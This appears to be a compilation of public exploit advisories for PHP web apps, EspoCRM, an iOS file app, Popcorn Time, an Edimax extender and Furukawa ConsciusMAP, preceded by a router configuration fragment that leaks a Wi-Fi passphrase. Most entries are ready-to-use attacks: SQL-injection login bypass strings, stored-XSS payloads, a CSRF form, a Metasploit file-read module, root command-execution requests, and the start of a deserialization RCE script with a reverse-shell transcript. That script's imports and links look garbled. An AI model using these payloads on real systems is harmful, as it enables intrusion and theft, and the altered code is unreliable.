_WPS_NO_BROADCAST_="y"; var _UPNP_LIB_VERSION2_="y"; var _WDS_UR_INFO_="y"; var _RESERVE_ENCRYPTION_SETTING_="y"; var _IGMP_PROXY_="y"; var _IGMPSNOOP_="y"; var _RFTYPE_="2T2R"; var _MEMBUS_="16"; var _MEMSIZE_="16"; var _MEMTYPE_="SDRAM"; var _FLASHTYPE_="SPI"; var _REMOVE_RADIUS_SERVER_="y"; var _AUTO_CHANNEL_DET_="y"; var _CONTROL_SIDEBAND_="y"; var _WIFI_11N_STANDARD_="y"; var _SETTING_WIZARD_="y"; var _CONFIG_FILE_NAME_="7438RPN"; var _AP_WITH_DNS_="y"; var _USE_DNRD_="y"; var _WPS_MIX_="y"; var _POWER_SAVING_="y"; var _WEB_FILE_NAME_="7438RPN"; var _PINCODE_BY_MAC_="y"; var _UPNP_RESPONDER_="y"; var _MDNS_RESPONDER_="y"; var _NETBIOS_RESPONDER_="y"; var _AP_WITH_DHCP_CLIENT_="y"; var _LLTD_NODENAME_="y"; var _DHCP_SWITCH_="y"; var _CONNECT_TEST_="y"; var _START_BOA_="y"; var _WPS_Daemon_="y"; var security = 1; apMode = 6; methodVal = 2; opMode = 0; apMachType = 1; var ssidTbl = new Array("PentesterTraining"); var mirrorTbl = ""; var secModeTbl = new 
Array("2"); var enable1XTbl = new Array("0"); var _1xMode = "0"; var wepTbl = new Array("0"); var keyTypeTbl = new Array("1"); var wpaCipherTbl = new Array("2"); var pskFormatTbl = new Array("0"); var pskValueTbl = new Array("wifipass123."); var defaultKeyIdTbl=new Array("0"); var rsIp= ""; var rsPort= "1812"; var rsPassword= ""; -- Besim ALTINOK *Security Engineer*
User Management System 2.0 - Persistent Cross-Site Scripting
# Exploit Title: User Management System 2.0 - Persistent Cross-Site Scripting # Author: Besim ALTINOK # Vendor Homepage: https://phpgurukul.com/ # Software Link: https://phpgurukul.com/user-registration-login-and-user-management-system-with-admin-panel/ # Version: v2.0 # Tested on: Xampp # Credit: İsmail BOZKURT ------ Details: 1- Vulnerable code is here: it inserts user registration information into the DB without filtering. if(isset($_POST['signup'])) { $fname=$_POST['fname']; $lname=$_POST['lname']; $email=$_POST['email']; $password=$_POST['password']; $contact=$_POST['contact']; $enc_password=$password; $msg=mysqli_query($con,"insert into users(fname,lname,email,password,contactno) values('$fname','$lname','$email','$enc_password','$contact')"); if($msg) { echo "<script>alert('Register successfully');</script>"; } } 2- In the admin dashboard: the fullName is fetched from the DB and printed without any filtering <?php $ret=mysqli_query($con,"select * from users"); $cnt=1; while($row=mysqli_fetch_array($ret)) {?> <tr> <td><?php echo $cnt;?></td> <td><?php echo $row['fname'];?></td> <td><?php echo $row['lname'];?></td> <td><?php echo $row['email'];?></td> <td><?php echo $row['contactno'];?></td> <td><?php echo $row['posting_date'];?></td> </tr> 4- If we set the value of "fname" to "script>prompt(1)</script>", we can perform this attack as stored XSS
User Management System 2.0 - Authentication Bypass
# Exploit Title: User Management System 2.0 - Authentication Bypass # Author: Besim ALTINOK # Vendor Homepage: https://phpgurukul.com/ # Software Link: https://phpgurukul.com/user-registration-login-and-user-management-system-with-admin-panel/ # Version: v2.0 # Tested on: Xampp # Credit: İsmail BOZKURT ------ Details: 1- Vulnerable code is here (admin login: /admin/index.php): <?php session_start(); include("dbconnection.php"); if(isset($_POST['login'])) { $adminusername=$_POST['username']; $pass=md5($_POST['password']); $ret=mysqli_query($con,"SELECT * FROM admin WHERE username='$adminusername' and password='$pass'"); $num=mysqli_fetch_array($ret); if($num>0) { $extra="manage-users.php"; $_SESSION['login']=$_POST['username']; $_SESSION['id']=$num['id']; echo "<script>window.location.href='".$extra."'</script>"; exit(); } else { $_SESSION['action1']="*Invalid username or password"; $extra="index.php"; echo "<script>window.location.href='".$extra."'</script>"; exit(); } } 2- We can bypass authentication with SQLi: Bypass code (user and admin login panel): Username: pentester' or'1'=1# Password : pentester' or'1'=1# Finally: there are many SQL-injectable inputs in this project, such as login, registration and forgot password ...
Complaint Management System 4.2 - Cross-Site Request Forgery (Delete User)
# Exploit Title: Complaint Management System 4.2 - Cross-Site Request Forgery (Delete User) # Author: Besim ALTINOK # Vendor Homepage: https://phpgurukul.com/ # Software Link: https://phpgurukul.com/complaint-management-sytem/ # Version: v4.2 # Tested on: Xampp # Credit: İsmail BOZKURT ************************************************* Detail: A CSRF attack can be performed against all of the functions. ---------------------------------------------- CSRF PoC for Delete User ---------------------------------------------- This request is sent as a GET request carrying the uid parameter. ------------------------------------------------------------------------ <html> <body> <script>history.pushState('', '', '/')</script> <form action="http://localhost/cms/admin/manage-users.php"> <input type="hidden" name="uid" value="4" /> <input type="hidden" name="" value="" /> <input type="hidden" name="action" value="del" /> <input type="submit" value="Submit request" /> </form> </body> </html>
Complaint Management System 4.2 - Authentication Bypass
# Exploit Title: Complaint Management System 4.2 - Authentication Bypass # Author: Besim ALTINOK # Vendor Homepage: https://phpgurukul.com/ # Software Link: https://phpgurukul.com/complaint-management-sytem/ # Version: v4.2 # Tested on: Xampp # Credit: İsmail BOZKURT ------ Details: 1- Vulnerable code is here: if(isset($_POST['submit'])) { $username=$_POST['username']; $password=md5($_POST['password']); $ret=mysqli_query($con,"SELECT * FROM admin WHERE username='$username' and password='$password'"); $num=mysqli_fetch_array($ret); if($num>0) { $extra="change-password.php";// $_SESSION['alogin']=$_POST['username']; $_SESSION['id']=$num['id']; $host=$_SERVER['HTTP_HOST']; $uri=rtrim(dirname($_SERVER['PHP_SELF']),'/\\'); header("location:http://$host$uri/$extra"); exit(); } 2- We can bypass authentication with SQLi: Bypass code (admin login panel): Username: pentester' or'1'=1# Password : pentester' or'1'=1# Finally: there are many SQL-injectable inputs in this project, such as login, registration and forgot password ... -----------------------------------
Complaint Management System 4.2 - Persistent Cross-Site Scripting
# Exploit Title: Complaint Management System 4.2 - Persistent Cross-Site Scripting # Author: Besim ALTINOK # Vendor Homepage: https://phpgurukul.com/ # Software Link: https://phpgurukul.com/complaint-management-sytem/ # Version: v4.2 # Tested on: Xampp # Credit: İsmail BOZKURT ------ Details: 1- Vulnerable code is here: http://localhost/cms/users/registration.php 2- Vulnerable code: it inserts user registration information into the DB without filtering. if(isset($_POST['submit'])) { $fullname=$_POST['fullname']; $email=$_POST['email']; $password=md5($_POST['password']); $contactno=$_POST['contactno']; $status=1; $query=mysqli_query($con,"insert into users(fullName,userEmail,password,contactNo,status) values('$fullname','$email','$password','$contactno','$status')"); $msg="Registration successfull. Now You can login !"; } ?> 3- In the admin dashboard: the fullName is fetched from the DB and printed without any filtering <tr> <td colspan="2"><b><?php echo $row['fullName'];?>'s profile</b></td> </tr> 4- If we set "fullName" to "script>prompt(2)</script>", we can perform this attack as stored XSS 5- Picture in the attachment ---------------------------------------------------
Library CMS Powerful Book Management System 2.2.0 - Session Fixation
# Exploit Title: Library CMS Powerful Book Management System 2.2.0 - Session Fixation # Date: 2020-04-22 # Exploit Author: Ismail Tasdelen # Vendor Homepage: https://kaasoft.pro/ # Software : https://codecanyon.net/item/library-cms-powerful-book-management-system/21105281 # Product Version: v2.2.0 # Product : Library CMS # Vulnerability Type : Broken Authentication # Vulnerability : Session Fixation # CVE : N/A # Description : A session fixation vulnerability has been discovered in version v2.2.0 of Library CMS Powerful Book Management System; note that the same PHPSESSID cookie value is presented in both the admin and member login requests below. Admin HTTP Request : POST /admin/login HTTP/1.1 Host: XXX.XXX.XXX.XXX User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://XXX.XXX.XXX.XXX/admin/login Content-Type: application/x-www-form-urlencoded Content-Length: 49 Connection: close Cookie: activeLanguage=en_US; PHPSESSID=nfj6gk1murk6jq47lpk5cv7qq6; activeLanguage=en_US; _ym_uid=1579299191562269050; _ym_d=1579299191; _ym_visorc_46947615=w; _ym_isad=2 Upgrade-Insecure-Requests: 1 login=USERNAME&password=PASSWORD Member HTTP Request : POST /admin/login HTTP/1.1 Host: XXX.XXX.XXX.XXX User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://XXX.XXX.XXX.XXX/admin/login Content-Type: application/x-www-form-urlencoded Content-Length: 50 Connection: close Cookie: activeLanguage=en_US; PHPSESSID=nfj6gk1murk6jq47lpk5cv7qq6; activeLanguage=en_US; _ym_uid=1579299191562269050; _ym_d=1579299191; _ym_visorc_46947615=w; _ym_isad=2 Upgrade-Insecure-Requests: 1 login=USERNAME&password=PASSWORD
Zen Load Balancer 3.10.1 - Directory Traversal (Metasploit)
## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Auxiliary::Scanner include Msf::Exploit::Remote::HttpClient def initialize(info={}) super(update_info(info, 'Name' => "Zen Load Balancer Directory Traversal", 'Description' => %q{ This module exploits a authenticated directory traversal vulnerability in Zen Load Balancer `v3.10.1`. The flaw exists in 'index.cgi' not properly handling 'filelog=' parameter which allows a malicious actor to load arbitrary file path. }, 'License' => MSF_LICENSE, 'Author' => [ 'Basim Alabdullah', # Vulnerability discovery 'Dhiraj Mishra' # Metasploit module ], 'References' => [ ['EDB', '48308'] ], 'DisclosureDate' => "Apr 10 2020" )) register_options( [ Opt::RPORT(444), OptBool.new('SSL', [true, 'Use SSL', true]), OptInt.new('DEPTH', [true, 'The max traversal depth', 16]), OptString.new('FILEPATH', [false, 'The name of the file to download', '/etc/passwd']), OptString.new('TARGETURI', [true, "The base URI path of the ZenConsole install", '/']), OptString.new('HttpUsername', [true, 'The username to use for the HTTP server', 'admin']), OptString.new('HttpPassword', [false, 'The password to use for the HTTP server', 'admin']) ]) end def run_host(ip) filename = datastore['FILEPATH'] traversal = "../" * datastore['DEPTH'] res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, 'index.cgi'), 'vars_get'=> { 'id' => '2-3', 'filelog' => "#{traversal}#(unknown)", 'nlines' => '100', 'action' => 'See logs' }, 'authorization' => basic_auth(datastore['HttpUsername'],datastore['HttpPassword']) }, 25) unless res && res.code == 200 print_error('Nothing was downloaded') return end print_good("#{peer} - Downloaded #{res.body.length} bytes") path = store_loot( 'zenload.http', 'text/plain', ip, res.body, filename ) print_good("File saved in: #{path}") end end
EspoCRM 5.8.5 - Privilege Escalation
# Exploit Title: EspoCRM 5.8.5 - Privilege Escalation # Author: Besim ALTINOK # Vendor Homepage: https://www.espocrm.com # Software Link: https://www.espocrm.com/downloads/EspoCRM-5.8.5.zip # Version: v5.8.5 # Tested on: Xampp # Credit: İsmail BOZKURT ------------- Details: -------------------------------------------- 1- When we send a request to /api/v1/App/user, we can see the user's details --- First Request: --------------------------- GET /api/v1/App/user HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 ************************* Authorization: Basic ************************************* Espo-Authorization: ************************************* Espo-Authorization-By-Token: true X-Requested-With: XMLHttpRequest DNT: 1 Connection: close Cookie: auth-token-secret=cdc7f7*********************377; auth-username=user1; auth-token=3a874a********************************48 ---- 2- When we decode the Basic Authorization and Espo-Authorization values and replace the username with another one (like admin) in the first request, we can see that user's information and obtain their level of access ---------- 3- Some examples of the encoding technique - BASE64: First type: dXNlcjE6MQ== (user1:1) Second type: user1:MzNmYzYwZDQ1ZDI2YWNhODYxZTZlYjdiMDgwMjk4TkRn (user1:pass)
Sky File 2.1.0 iOS - Directory Traversal
# Title: Sky File 2.1.0 iOS - Directory Traversal # Author: Vulnerability Laboratory # Date: 2020-04-21 # Software Link: https://apps.apple.com/us/app/sky-file-wireless-transfer/id1236452210 # CVE: N/A Document Title: =============== Sky File v2.1.0 iOS - Multiple Web Vulnerabilities References (Source): ==================== https://www.vulnerability-lab.com/get_content.php?id=2207 Common Vulnerability Scoring System: ==================================== 7.2 Affected Product(s): ==================== Jin Chen Product: Sky File v2.1.0 - (iOS) Mobile Web Application (https://apps.apple.com/us/app/sky-file-wireless-transfer/id1236452210) Vulnerability Disclosure Timeline: ================================== 2020-04-21: Public Disclosure (Vulnerability Laboratory) Technical Details & Description: ================================ 1.1 Multiple persistent cross site scripting vulnerabilities have been discovered in the official Sky File v2.1.0 mobile iOS web application. The vulnerability allows remote attackers to inject their own malicious script code with a persistent attack vector to compromise browser-to-web-application requests from the application side. The cross site scripting vulnerability is located in the 'createFolder' module. Remote attackers with access to the UI via wifi are able to inject their own malicious persistent script code to compromise the web application or user credentials. The request method used to inject is POST and the attack vector is located on the application side. Successful exploitation of the vulnerability results in session hijacking, persistent phishing, persistent external redirects and application-side manipulation of the web context of the affected and connected device module. 1.2 A directory traversal web vulnerability has been discovered in the official Sky File v2.1.0 mobile iOS web application. The web vulnerability allows an attacker to change the path or directory without authorization in order to access sensitive application data. 
The directory/path web vulnerability is located in the local FTP server's configuration and path validation, combined with insecure access permissions. Normally the anonymous user account is only able to move inside the main app folder, not above it into the web-server and root application files. In this case remote attackers are able to connect to the wifi FTP server with the anonymous user account credentials. After that the attacker can use a misconfiguration in the FTP server's handling of the app path by transmitting `/null//` path commands after CWD and CDUP navigation via an FTP client. This finally allows the attacker unauthorized access to the main root application path. Successful exploitation of the directory traversal vulnerability results in unauthorized file system access and information disclosure. Proof of Concept (PoC): ======================= 1.1 The persistent script code injection vulnerability can be exploited by remote attackers with wifi network access and low user interaction. For security demonstration, or to reproduce the web vulnerability, follow the information and steps provided below. 
PoC: Payload %2F%3E%22%3E%3Ciframe+src%3Devil.source+onload%3Dalert(%22PWND%22)%3E%3E%22%3E --- PoC Session Logs [POST] --- Status: 200[OK] POST http://localhost:10000/create Mime Type[application/json] Request Header: Host[localhost:10000] User-Agent[Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0] Accept[application/json, text/javascript, */*; q=0.01] Accept-Language[de,en-US;q=0.7,en;q=0.3] Accept-Encoding[gzip, deflate] Content-Type[application/x-www-form-urlencoded; charset=UTF-8] X-Requested-With[XMLHttpRequest] Referer[http://localhost:10000/] Content-Length[140] Connection[keep-alive] POST-Daten: path[%2F%3E%22%3E%3Ciframe+src%3Devil.source+onload%3Dalert(%22PWND%22)%3E%3E%22%3E] Response Header: Cache-Control[no-cache] Content-Length[2] Content-Type[application/json] Connection[Close] Server[GCDWebUploader] - Status: 200[OK] GET http://localhost:10000/list?path=%2F%3E%22%3E%3Ciframe+src%3Devil.source+onload%3Dalert(%22PWND%22)%3E%3E Mime Type[application/json] Request Header: Host[localhost:10000] User-Agent[Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0] Accept[application/json, text/javascript, */*; q=0.01] Accept-Language[de,en-US;q=0.7,en;q=0.3] Accept-Encoding[gzip, deflate] X-Requested-With[XMLHttpRequest] Referer[http://localhost:10000/] Connection[keep-alive] Response Header: Cache-Control[no-cache] Content-Length[2] Content-Type[application/json] Connection[Close] Server[GCDWebUploader] - Status: 200[OK] GET http://localhost:10000/evil.source Mime Type[application/x-unknown-content-type] Request Header: Host[localhost:10000] User-Agent[Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0] Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] Accept-Language[de,en-US;q=0.7,en;q=0.3] Accept-Encoding[gzip, deflate] Referer[http://localhost:10000/] Connection[keep-alive] Upgrade-Insecure-Requests[1] Response Header: Server[GCDWebUploader] 
Connection[Close] 1.2 The directory traversal web vulnerability can be exploited by remote attackers with wifi network access without user interaction. For security demonstration or to reproduce the web vulnerability follow the provided information and steps below to continue. Manual steps to reproduce ... 1. Open the ftp preview the visible folders 2. Jump back to the the following path /private/var/mobile/Containers/Data/Application/A9124FFE-16D8-413B-83B7-4018B69AEB45/ 3. Include the payload /(null)// and refresh via list command 4. You are now placed in an empty folder without permission to move 5. Add to /(null)/../ to the path and refresh the client 6. Path traversal successful to access the main app root path (./) that is normally not accessable 7. Successful reproduce of the path traversal web vulnerability! PoC: Payload /(null)// to /(null)/../ --- PoC Sessio Logs (FTP) --- [21:52:40] [R] 221- Data traffic for this session was 0 bytes in 0 files [21:52:40] [R] 221 Thank you for using the FTP service on localhost. [21:52:40] [R] Logged off: 192.168.2.116 (Duration: 26 seconds) [21:52:42] [R] Connecting to 192.168.2.116 -> IP=192.168.2.116 PORT=10001 [21:52:42] [R] Connected to 192.168.2.116 [21:52:42] [R] 220 iosFtp server ready. [21:52:42] [R] USER anonymous [21:52:42] [R] 331 Password required for (null) [21:52:42] [R] PASS (hidden) [21:52:42] [R] 230 User (null) logged in. [21:52:42] [R] SYST [21:52:42] [R] 215 UNIX Type: L8 Version: iosFtp 20080912 [21:52:42] [R] FEAT [21:52:42] [R] 211-Features supported [21:52:42] [R] UTF8 [21:52:42] [R] 211 End [21:52:42] [R] OPTS UTF8 ON [21:52:42] [R] 200 Type set Opts to UTF8. [21:52:42] [R] PWD [21:52:42] [R] 257 "/private/var/mobile/Containers/Data/Application/A9124FFE-16D8-413B-83B7-4018B69AEB45/Documents/myFolder/iFolder" is the current directory. [21:52:42] [R] CWD /(null)/ [21:52:42] [R] 550 CWD failed. 
[21:52:42] [R] PWD [21:52:42] [R] 257 "/private/var/mobile/Containers/Data/Application/A9124FFE-16D8-413B-83B7-4018B69AEB45/Documents/myFolder/iFolder" is the current directory. [21:52:42] [R] PASV [21:52:42] [R] 227 Entering Passive Mode (192,168,2,116,39,252) [21:52:42] [R] Opening data connection IP: 192.168.2.116 PORT: 10236 [21:52:42] [R] LIST -al [21:52:42] [R] 150 Opening ASCII mode data connection for '/bin/ls'. [21:52:42] [R] 226 Transfer complete. [21:52:42] [R] List Complete: 149 bytes in 0,08 seconds (0,1 KB/s) [21:52:43] [R] CDUP [21:52:43] [R] 250 CDUP command successful. [21:52:43] [R] PWD [21:52:43] [R] 257 "/private/var/mobile/Containers/Data/Application/A9124FFE-16D8-413B-83B7-4018B69AEB45/Documents/myFolder" is the current directory. [21:52:43] [R] PASV [21:52:43] [R] 227 Entering Passive Mode (192,168,2,116,87,51) [21:52:43] [R] Opening data connection IP: 192.168.2.116 PORT: 22323 [21:52:43] [R] LIST -al [21:52:43] [R] 150 Opening ASCII mode data connection for '/bin/ls'. [21:52:43] [R] 226 Transfer complete. [21:52:43] [R] List Complete: 308 bytes in 0,10 seconds (0,3 KB/s) [21:52:43] [R] CDUP [21:52:44] [R] 250 CDUP command successful. [21:52:44] [R] PWD [21:52:44] [R] 257 "/private/var/mobile/Containers/Data/Application/A9124FFE-16D8-413B-83B7-4018B69AEB45/Documents" is the current directory. [21:52:44] [R] PASV [21:52:44] [R] 227 Entering Passive Mode (192,168,2,116,151,51) [21:52:44] [R] Opening data connection IP: 192.168.2.116 PORT: 38707 [21:52:44] [R] LIST -al [21:52:44] [R] 150 Opening ASCII mode data connection for '/bin/ls'. [21:52:44] [R] 226 Transfer complete. [21:52:44] [R] List Complete: 127 bytes in 0,08 seconds (0,1 KB/s) [21:53:34] [R] CDUP [21:53:34] [R] 250 CDUP command successful. [21:53:34] [R] PWD [21:53:34] [R] 257 "/private/var/mobile/Containers/Data/Application/A9124FFE-16D8-413B-83B7-4018B69AEB45" is the current directory. 
[21:53:34] [R] PASV [21:53:34] [R] 227 Entering Passive Mode (192,168,2,116,227,14) [21:53:34] [R] Opening data connection IP: 192.168.2.116 PORT: 58126 [21:53:34] [R] LIST -al [21:53:34] [R] 150 Opening ASCII mode data connection for '/bin/ls'. [21:53:34] [R] 226 Transfer complete. [21:53:34] [R] List Complete: 312 bytes in 0,08 seconds (0,3 KB/s) [21:53:35] [R] CDUP [21:53:35] [R] 250 CDUP command successful. [21:53:35] [R] PWD [21:53:35] [R] 257 "(null)" is the current directory. [21:53:35] [R] PASV [21:53:35] [R] 227 Entering Passive Mode (192,168,2,116,159,14) [21:53:35] [R] Opening data connection IP: 192.168.2.116 PORT: 40718 [21:53:35] [R] LIST -al [21:53:35] [R] 150 Opening ASCII mode data connection for '/bin/ls'. [21:53:35] [R] 226 Transfer complete. [21:53:35] [R] List Complete: 0 bytes in 0,07 seconds (0,0 KB/s) [21:53:35] [R] PASV [21:53:35] [R] 227 Entering Passive Mode (192,168,2,116,143,14) [21:53:35] [R] Opening data connection IP: 192.168.2.116 PORT: 36622 [21:53:35] [R] LIST -al [21:53:35] [R] 150 Opening ASCII mode data connection for '/bin/ls'. [21:53:35] [R] 226 Transfer complete. [21:53:35] [R] List Complete: 0 bytes in 0,06 seconds (0,0 KB/s) [21:53:36] [R] CDUP [21:53:36] [R] 550 CDUP command failed. [21:53:41] [R] CWD /etc [21:53:41] [R] 250 CWD command successful. [21:53:41] [R] PWD [21:53:41] [R] 257 "(null)" is the current directory. [21:53:48] [R] CDUP [21:53:48] [R] 550 CDUP command failed. [21:53:51] [R] CWD / [21:53:51] [R] 250 CWD command successful. [21:53:51] [R] PWD [21:53:51] [R] 257 "/" is the current directory. [21:53:51] [R] PASV [21:53:51] [R] 227 Entering Passive Mode (192,168,2,116,221,173) [21:53:51] [R] Opening data connection IP: 192.168.2.116 PORT: 56749 [21:53:51] [R] LIST -al [21:53:51] [R] 150 Opening ASCII mode data connection for '/bin/ls'. [21:53:51] [R] 226 Transfer complete. [21:53:51] [R] List Complete: 741 bytes in 0,10 seconds (0,7 KB/s) [21:54:02] [R] TYPE I [21:54:02] [R] 200 Type set to I. 
Listing Path ./root - Applications - bin - cores - developer - Library - private - sbin - System - usr - etc - var - tmp Credits & Authors: ================== Vulnerability-Lab - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab Benjamin Kunz Mejri - https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M. -- VULNERABILITY LABORATORY - RESEARCH TEAM
Popcorn Time 6.2 - 'Update service' Unquoted Service Path
# Exploit Title: Popcorn Time 6.2 - 'Update service' Unquoted Service Path # Date: 2020-04-24 # Vendor Homepage: https://getpopcorntime.is # Exploit Authors: Uriel Yochpaz & Jonatan Schor # Software Link: https://dl.getpopcorntime.is/PopcornTime-latest.exe # Version: 6.2.1.14 and probably prior versions # Tested on: Windows 10, 7 # CVE : N/A [+] Description: Popcorn Time For Windows installs as a service with an unquoted service path running with SYSTEM privileges. This could potentially allow an authorized but non-privileged local user to execute arbitrary code with elevated privileges on the system. [+] POC: C:\Users\User>sc qc "Update service" [SC] QueryServiceConfig SUCCESS SERVICE_NAME: Update service TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files (x86)\Popcorn Time\Updater.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : Update service DEPENDENCIES : SERVICE_START_NAME : LocalSystem [+] Exploit: A successful attempt would require the local user to be able to insert their code in "Program files (x86)" (popcorn.exe) or "C:\" (program.exe) folders undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.
Edimax EW-7438RPn 1.13 - Remote Code Execution
# Exploit Title: Edimax EW-7438RPn 1.13 - Remote Code Execution # Date: 2020-04-23 # Exploit Author: Besim ALTINOK # Vendor Homepage: https://www.edimax.com/edimax/merchandise/merchandise_detail/data/edimax/global/wi-fi_range_extenders_n300/ew-7438rpn_mini/ # Version:1.13 # Tested on: Edimax EW-7438RPn 1.13 Version ------ NOTE: This device configurated with root permissions. So you can run the command as root Here is the detail(s) of the RCE(s) 1- Content of the mp.asp file <form action="/goform/mp" method="POST" name="mp"> <input type="text" name="command" value=""> <input type="submit" value="GO"> <input type="hidden" name="getID" value=""> <input type="hidden" name="getID" value=""> </form> RCE Detail: ------------------------------- POST /goform/mp HTTP/1.1 Host: 192.168.2.2 User-Agent: Mozilla/5.0 ********************* Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 25 DNT: 1 Authorization: Basic YWRtaW46MTIzNA== Connection: close Cookie: language=1 Upgrade-Insecure-Requests: 1 command=||busybox+ls&getID= ------------------------------- 2- Content of the syscmd.asp <form action=/goform/formSysCmd method=POST name="formSysCmd"><table border=0 width="500" cellspacing=0 cellpadding=0> <tr><font size=2> This page can be used to run target system command.</tr> <tr><hr size=1 noshade align=top></tr> <tr> <td>System Command: </td> <td><input type="text" name="sysCmd" value="" size="20" maxlength="50"></td> <td> <input type="submit" value="Apply" name="apply" onClick='return saveClick()'></td></form> RCE Detail: ------------------------------- POST /goform/formSysCmd HTTP/1.1 Host: 192.168.2.2 User-Agent: Mozilla/5.0 ********************* Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded 
Content-Length: 11 DNT: 1 Authorization: Basic YWRtaW46MTIzNA== Connection: close Cookie: language=1 Upgrade-Insecure-Requests: 1 sysCmd="command to here"
Furukawa Electric ConsciusMAP 2.8.1 - Remote Code Execution
# Exploit Title: Furukawa Electric ConsciusMAP 2.8.1 - Remote Code Execution # Date: 2020-04-24 # Vendor Homepage: https://www.tecnoredsa.com.ar # Exploit Authors: LiquidWorm # Software Link: https://dl.getpopcorntime.is/PopcornTime-latest.exe # Version: 2.8.1 # CVE : N/A #!/usr/bin/env python3 # -*- coding: utf-8 -*- # # # Furukawa Electric ConsciusMAP 2.8.1 Java Deserialization Remote Code Execution # # # Vendor: Furukawa Electric Co., Ltd. | Tecnored SA # Product web page: https://www.furukawa.co.jp | https://www.tecnoredsa.com.ar # Affected version: APROS Evolution | 2.8.1 # FURUKAWA | 2.7.10 # ConsciusMAP | 2.6.4 # | 2.3.1 # | 2.1.49 # | 2.1.36 # | 2.1.31 # | 2.1.18 # | 2.1.16 # | 2.1.15 # | 2.1.1 # | 2.0.1174 # | 1.8 # | 1.4.70 # # Summary: Apros Evoluation / Furukawa / ConsciusMap is the Tecnored # provisioning system for FTTH networks. Complete administration of # your entire external FTTH network plant, including from the ONUs # installed in each end customer, to the wiring and junction boxes. # Unify all the management of your FTTH network on a single platform. # Unify all your data, whether from customers, your network, or the # external plant in one place. APROS FTTH allows you to manage your # entire FTTH network in a simple and globalized way with just one # click, without being a network expert. Includes services such as: # bandwidth limitation, Turbo Internet for time plans, BURST Internet, # QinQ for companies, and many more. General consumption graphics and # per customer in real time. Captive Portal for cutting or suspension # of the service. # # Desc: The FTTH provisioning solution suffers from an unauthenticated # remote code execution vulnerability due to an unsafe deserialization # of Java objects (ViewState) triggered via the 'javax.faces.ViewState' # HTTP POST parameter. 
The deserialization can cause the vulnerable JSF # web application to execute arbitrary Java functions, malicious Java # bytecode, and system shell commands with root privileges. # # =================================================================== # $ ./furukawa.py 172.16.0.1:8080 172.168.0.200 4444 # [*] Setting up valid URL path # [*] Starting callback listener child thread # [*] Starting handler on port 4444 # [*] Sending serialized object # [*] Connection from 172.16.0.1:48446 # [*] You got shell! # tomcat7@zslab:/var/lib/tomcat7$ id # uid=114(tomcat7) gid=124(tomcat7) grupos=124(tomcat7),1003(furukawa) # tomcat7@zslab:/var/lib/tomcat7$ sudo su # id # uid=0(root) gid=0(root) grupos=0(root) # exit # tomcat7@zslab:/var/lib/tomcat7$ exit # *** Connection closed by remote host *** # =================================================================== # # Tested on: Apache Tomcat/7.0.68 # Apache Tomcat/7.0.52 # Apache MyFaces/2.2.1 # Apache MyFaces/2.1.17 # Apache MyFaces/2.0.10 # GNU/Linux 4.4.0-173 # GNU/Linux 4.4.0-137 # GNU/Linux 4.4.0-101 # GNU/Linux 4.4.0-83 # GNU/Linux 3.15.0 # GNU/Linux 3.13.0-32 # PrimeFaces/4.0.RC1 # Apache-Coyote/1.1 # ACC Library 3.1 # Ubuntu 16.04.2 # Ubuntu 14.04.2 # Java/1.8.0_242 # Java/1.8.0_181 # Java/1.8.0_131 # Java/1.7.0_79 # MySQL 5.7.29 # MySQL 5.7.18 # # # Vulnerability discovered by Gjoko 'LiquidWorm' Krstic # Macedonian Information Security Research and Development Laboratory # Zero Science Lab - https://www.zeroscience.mk - @zeroscience # # # Advisory ID: ZSL-2020-5565 # Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5565.php # # CVE ID: CVE-2020-12133 # CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2020-12133 # # # 24.02.2020 # import os############# import sys############ import gzip#######o### import zlib########### import socket######### import base64######### import urllib######### import requests####### import telnetlib###### import threading###### import subprocess##### from io 
import BytesIO
from time import sleep
from flash import blic


class Optics:
    """Exploit harness for the ViewState deserialization issue described in the
    file header (ZSL-2020-5565 / CVE-2020-12133).

    Flow, as driven by main(): par() reads argv, check() probes the target root
    to pick the application path, thricer() starts the listener thread and then
    gadget() POSTs a gzip-compressed, base64-encoded Java serialization stream
    as the ``javax.faces.ViewState`` form field.

    Defender notes:
      * The request is an unauthenticated POST to ``<target>/FURUKAWA/`` or
        ``<target>/APROS/`` whose ``javax.faces.ViewState`` value gunzips to a
        stream starting with the Java serialization magic ``AC ED 00 05``; an
        encrypted and MAC'd ViewState would not decode that way. That, plus the
        fixed User-Agent and Accept strings set in gadget(), is the detection
        signal for this script.
      * Mitigation is server-side: keep client-side ViewState encrypted and
        authenticated (or use server-side state saving), patch the affected
        product, and restrict deserialization with a JVM serialization filter
        (``jdk.serialFilter``).
    """

    def __init__(self):
